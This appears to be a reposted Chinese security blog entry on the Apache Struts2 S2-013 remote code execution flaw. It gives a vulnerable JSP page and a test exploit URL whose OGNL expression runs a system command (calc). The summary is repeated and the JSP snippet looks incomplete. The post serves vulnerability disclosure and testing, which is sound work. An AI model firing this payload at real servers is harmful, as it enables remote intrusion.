Struts2再爆远程代码执行漏洞

没穿底裤 2020年1月1日02:29:41评论415 views字数 465阅读1分33秒阅读模式
摘要

摘要
Apache官方的struts2产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是0DAY,官方没有修补方案出现。
http://struts.apache.org/development/2.x/docs/security-bulletins.html — (公告)
官方安全公告给出了编号和简要介绍,“A vulnerability, present in the includeParams attribute of the URL and Anchor Tag, allows remote command execution”。
但是并没有说原理,也没有发布任何补丁。

摘要
Apache官方struts2产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是0DAY,官方没有修补方案出现。
http://struts.apache.org/development/2.x/docs/security-bulletins.html — (公告)
官方安全公告给出了编号和简要介绍,“A vulnerability, present in the includeParams attribute of the URL and Anchor Tag, allows remote command execution”。
但是并没有说原理,也没有发布任何补丁。

s.jsp:
Java代码
[php]
<%@ page language="java" import="java.util.*" pageEncoding="utf-8"%>
<%@ taglib prefix="s" uri="/struts-tags"%>
Click here.[/php]

测试EXP:
[php]http://admin-pc:8080/Struts2/s.jsp?a=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec('calc')}[/php]

Struts2再爆远程代码执行漏洞

Struts2再爆远程代码执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日02:29:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Struts2再爆远程代码执行漏洞http://cn-sec.com/archives/75161.html

发表评论

匿名网友 填写信息